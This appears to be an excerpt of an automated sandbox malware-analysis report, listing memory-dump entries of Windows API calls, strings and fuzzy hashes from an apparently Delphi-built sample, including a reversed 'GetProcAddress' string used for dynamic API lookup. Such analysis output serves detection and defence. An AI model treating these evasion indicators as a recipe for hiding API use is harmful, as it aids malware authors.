                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                • Instruction ID: 1cceb8f77dafaa017f91d726842297ba8f785c5d6847c5151728d66a368b3e33
                                                                                                                                • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                • Instruction Fuzzy Hash: 66D05EA330E2602AE214915A3DC4DBB5AECCAC57A1F00403ABA88C6182D6008C0BDAB5
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LocalTime
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 481472006-0
                                                                                                                                • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                • Instruction ID: 1c197db1d3c63ed6858c7af3f26fd1e7991fc7f8ba2e2750915b60a255f89cb9
                                                                                                                                • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                • Instruction Fuzzy Hash: 91A01180888820828A8033282C02A383088A820F20FC88B80B8F8802E0EE2E023080A3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02A0D29D
                                                                                                                                  • Part of subcall function 02A0D268: GetProcAddress.KERNEL32(00000000), ref: 02A0D281
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                • API String ID: 1646373207-1918263038
                                                                                                                                • Opcode ID: 93df13d62db4c2696b1ee10adebc207d963c008956fd45b4229cce664f048b09
                                                                                                                                • Instruction ID: 0469fa1a3dfd7d6b0bae9d99f12db8f9c71aa1bd064616bedeae7989bdbe2106
                                                                                                                                • Opcode Fuzzy Hash: 93df13d62db4c2696b1ee10adebc207d963c008956fd45b4229cce664f048b09
                                                                                                                                • Instruction Fuzzy Hash: F4416AB7A88B085B52046AED7DC0427F79ED65CB243B0461AF4049B7C4ED31FC528E2A
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02A16EDE
                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02A16EEF
                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02A16EFF
                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02A16F0F
                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02A16F1F
                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02A16F2F
                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02A16F3F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                • API String ID: 667068680-2233174745
                                                                                                                                • Opcode ID: e3a8e9398c9f1429dfd3431d35d0754ad386cd527caf742d2c4d048a10f4a14b
                                                                                                                                • Instruction ID: de78bcd054a7792e00ebbb1411a6d7e7ad0d2eabbc917a0901ceccb9e6f07dca
                                                                                                                                • Opcode Fuzzy Hash: e3a8e9398c9f1429dfd3431d35d0754ad386cd527caf742d2c4d048a10f4a14b
                                                                                                                                • Instruction Fuzzy Hash: C7F042E0AC93407EB614BBB46FC193627AEB520F197011C1A790395581EE79E4768F20
                                                                                                                                APIs
                                                                                                                                • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02A028CE
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Message
                                                                                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                • API String ID: 2030045667-32948583
                                                                                                                                • Opcode ID: 68805d1ba7e2c2f95f2afce2289ceae1d1a87906bfdffc53181088e57b1bea52
                                                                                                                                • Instruction ID: e6526762588b02a91c0f86082facf72f47f8a1306d6e5d19ea9abdb7a84a59da
                                                                                                                                • Opcode Fuzzy Hash: 68805d1ba7e2c2f95f2afce2289ceae1d1a87906bfdffc53181088e57b1bea52
                                                                                                                                • Instruction Fuzzy Hash: 5CA1D230E043648BEF21AB2CDCC8B99B6E5EB09350F1440E5ED49AB2C5CF759989CF51
                                                                                                                                Strings
                                                                                                                                • , xrefs: 02A02814
                                                                                                                                • Unexpected Memory Leak, xrefs: 02A028C0
                                                                                                                                • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02A02849
                                                                                                                                • An unexpected memory leak has occurred. , xrefs: 02A02690
                                                                                                                                • bytes: , xrefs: 02A0275D
                                                                                                                                • 7, xrefs: 02A026A1
                                                                                                                                • The unexpected small block leaks are:, xrefs: 02A02707
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                • API String ID: 0-2723507874
                                                                                                                                • Opcode ID: 0de52962b5d4f3768524dedfe1ab6dcf59b7b5ea451ee345b74f39bd1965a7c8
                                                                                                                                • Instruction ID: b234622a0b2d1ee4e7444536d5776dcd16c2ffdd439de46963acecb3083458cd
                                                                                                                                • Opcode Fuzzy Hash: 0de52962b5d4f3768524dedfe1ab6dcf59b7b5ea451ee345b74f39bd1965a7c8
                                                                                                                                • Instruction Fuzzy Hash: 1D71A130A043588EEF219B2CDCC8B99BAE5EB09744F1041E5D949972C1DF759989CF51
                                                                                                                                APIs
                                                                                                                                • GetThreadLocale.KERNEL32(00000000,02A0C08B,?,?,00000000,00000000), ref: 02A0BDF6
                                                                                                                                  • Part of subcall function 02A0A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A0A7E2
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Locale$InfoThread
                                                                                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                • API String ID: 4232894706-2493093252
                                                                                                                                • Opcode ID: 4c4b3713c0fe25a118b9abc9f3add67d9553bd05e3cb9ee465a277e567c02ab5
                                                                                                                                • Instruction ID: bcb167e5f559cfc8f460e70cd3c910d391c34ddeb820ba3c53c1a9e17c71a36f
                                                                                                                                • Opcode Fuzzy Hash: 4c4b3713c0fe25a118b9abc9f3add67d9553bd05e3cb9ee465a277e567c02ab5
                                                                                                                                • Instruction Fuzzy Hash: E3610134B402489BDB00EBA4FED0B9F77BBAB88700F509935A2019B6C5DE39DD05CB91
                                                                                                                                APIs
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 02A1B000
                                                                                                                                • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02A1B017
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 02A1B0AB
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000002), ref: 02A1B0B7
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 02A1B0CB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Read$HandleModule
                                                                                                                                • String ID: KernelBase$LoadLibraryExA
                                                                                                                                • API String ID: 2226866862-113032527
                                                                                                                                • Opcode ID: 3d3fb7afebf31d20f582326b46d4772ae2e23652303886b2ab96fc44e22d544e
                                                                                                                                • Instruction ID: bc6568a988d53597e4a4dbba04ec4024027184068b3a305737345c327e01bb65
                                                                                                                                • Opcode Fuzzy Hash: 3d3fb7afebf31d20f582326b46d4772ae2e23652303886b2ab96fc44e22d544e
                                                                                                                                • Instruction Fuzzy Hash: BD3162B1640305BBEB20DBA8CDC5F69B7A8BF05778F044954EA64AB2C1DF35A950CB60
                                                                                                                                APIs
                                                                                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A04423,?,?,02A867C8,?,?,02A2E7A8,02A065B1,02A2D30D), ref: 02A04395
                                                                                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A04423,?,?,02A867C8,?,?,02A2E7A8,02A065B1,02A2D30D), ref: 02A0439B
                                                                                                                                • GetStdHandle.KERNEL32(000000F5,02A043E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A04423,?,?,02A867C8), ref: 02A043B0
                                                                                                                                • WriteFile.KERNEL32(00000000,000000F5,02A043E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A04423,?,?), ref: 02A043B6
                                                                                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02A043D4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileHandleWrite$Message
                                                                                                                                • String ID: Error$Runtime error at 00000000
                                                                                                                                • API String ID: 1570097196-2970929446
                                                                                                                                • Opcode ID: 5bb4e2b0725cbcfad402774bc001e8a305ed0398528aa82e26e46e324338f8ef
                                                                                                                                • Instruction ID: 56f2e8b42a198d6f126cebd8a4c91f364414fe13d5188aa0b1e6578031be9986
                                                                                                                                • Opcode Fuzzy Hash: 5bb4e2b0725cbcfad402774bc001e8a305ed0398528aa82e26e46e324338f8ef
                                                                                                                                • Instruction Fuzzy Hash: E5F0B460EC8350B5F610B3A47EC6F99776C774CF25F100A49B724A40C0AFA4A4CD8B27
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A0AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02A0AD59
                                                                                                                                  • Part of subcall function 02A0AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02A0AD7D
                                                                                                                                  • Part of subcall function 02A0AD3C: GetModuleFileNameA.KERNEL32(02A00000,?,00000105), ref: 02A0AD98
                                                                                                                                  • Part of subcall function 02A0AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02A0AE2E
                                                                                                                                • CharToOemA.USER32(?,?), ref: 02A0AEFB
                                                                                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02A0AF18
                                                                                                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A0AF1E
                                                                                                                                • GetStdHandle.KERNEL32(000000F4,02A0AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A0AF33
                                                                                                                                • WriteFile.KERNEL32(00000000,000000F4,02A0AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A0AF39
                                                                                                                                • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02A0AF5B
                                                                                                                                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02A0AF71
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 185507032-0
                                                                                                                                • Opcode ID: 16494e6d4126358277c00cba9b3e9daef153e53372e14eab663c9c1c34080f50
                                                                                                                                • Instruction ID: e2a97f2c2c0716e2a94d5edbc825254c3a42918b269aa67bff0dbf2abc4b4035
                                                                                                                                • Opcode Fuzzy Hash: 16494e6d4126358277c00cba9b3e9daef153e53372e14eab663c9c1c34080f50
                                                                                                                                • Instruction Fuzzy Hash: 0C115EB2584300BEE200FBA4EEC4F9B77EDAB44B04F404926B744D60E1DE75E9148B62
                                                                                                                                APIs
                                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02A0E625
                                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02A0E641
                                                                                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02A0E67A
                                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02A0E6F7
                                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02A0E710
                                                                                                                                • VariantCopy.OLEAUT32(?,00000000), ref: 02A0E745
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 351091851-0
                                                                                                                                • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                • Instruction ID: a31fc3e6a0785d290552d7b0143332b63d4899e00a1093845b6195f3ca4e79c2
                                                                                                                                • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                • Instruction Fuzzy Hash: EF510C759416299BCB26DF98EAC0BD9B3BDAF4C300F0049D5E508E7281DA30AF819F61
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A035BA
                                                                                                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02A03609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A035ED
                                                                                                                                • RegCloseKey.ADVAPI32(?,02A03610,00000000,?,00000004,00000000,02A03609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A03603
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                • API String ID: 3677997916-4173385793
                                                                                                                                • Opcode ID: c0072c70763cbf540c06f17cd371247ed1e2a7676646389218151f6e931e1f01
                                                                                                                                • Instruction ID: ea8c521671752ac6837ec202c83bf3f17c2a4f1d312de7570a8b7552f601df7f
                                                                                                                                • Opcode Fuzzy Hash: c0072c70763cbf540c06f17cd371247ed1e2a7676646389218151f6e931e1f01
                                                                                                                                • Instruction Fuzzy Hash: 6001B575984218BAEB11DBD0AE82BBAB7ECE70CB00F1005A1BA04D66C0EA74A551CA59
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 02A182D9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                • String ID: Kernel32$sserddAcorPteG
                                                                                                                                • API String ID: 667068680-1372893251
                                                                                                                                • Opcode ID: d3dc14a3ccb30e119affef5562b8ccc4f1f27f984d1176fc9e7c61fa58cd84a2
                                                                                                                                • Instruction ID: d5ce6bcf51e881f3f29a0fa9e4239e4a18b3d80fe0d03a1f1624b710571a8184
                                                                                                                                • Opcode Fuzzy Hash: d3dc14a3ccb30e119affef5562b8ccc4f1f27f984d1176fc9e7c61fa58cd84a2
                                                                                                                                • Instruction Fuzzy Hash: 3001FF78680304BFEB05EBA4ED91E5EB7AEFB4DB10F6144A0E900D7680DE74A911CA65
                                                                                                                                APIs
                                                                                                                                • GetThreadLocale.KERNEL32(?,00000000,02A0AAE7,?,?,00000000), ref: 02A0AA68
                                                                                                                                  • Part of subcall function 02A0A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A0A7E2
                                                                                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02A0AAE7,?,?,00000000), ref: 02A0AA98
                                                                                                                                • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02A0AAA3
